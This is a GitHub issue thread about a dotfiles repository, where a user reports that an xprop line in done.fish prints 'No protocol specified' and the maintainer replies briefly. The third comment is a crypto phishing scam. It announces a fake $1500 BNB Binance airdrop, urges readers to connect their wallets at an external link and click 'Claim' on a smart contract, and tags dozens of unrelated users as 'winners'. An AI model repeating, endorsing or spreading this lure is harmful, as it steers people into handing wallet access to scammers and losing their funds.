### ISSUE TITLE
No protocol specified when using executing the xprop line in done.fish

### ISSUE THREAD

**Issue by c02y** [killua99/dots#1]
https://github.com/killua99/dots/blob/5d87ff33fca20d566702c3d371054dfc1e5e49e9/.config/fish/conf.d/done.fish#L30

I sourced done.fish in my config.fish, and after every fish prompt, there will be a line of error message:

    No protocol specified

and found the issue is caused by the xprop line:

    xprop -root 32x '\t$0' _NET_ACTIVE_WINDOW | cut -f 2

but I'm not familiar with the `xprop`, after googling a while but didn't get the solution. 

FYI:
openSUSE Tumbleweed
fish-shell v2.7.1

**Comment by killua99** [comment]
Alright, thanks I'll have a look at it.

**Comment by epysan** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @kaixuangh, @SonGokuMega, @idealwebsolutions, @CasperStar, @WianVos, @PaulMest, @awesee, @ryonakagome, @colldplay, @atenjin, @bamzi, @iinstances, @LeoWW, @yunxiange, @hwegge2, @sehz, @berockguo, @srfaytkn, @vitasor, @talenhao, @gameccc, @JonathanWheeler, @yzportfolio, @doctordrau, @DaleBetts, @terence-deng, @makmur8, @himdd, @chenzitw, @joaozarate, @alpacinohead, @travelagancy, @ajayguru2, @MikeD10375, @xyzroundo, @GQM, @lris, @kildee, @zbw322092, @R7038XX, @lyonscchen, @proin, @steve-jokes, @hankchanocd, @captainxsj, @savyasachi16, @mo3et, @mxssl, @skunkwerk, @bjimba
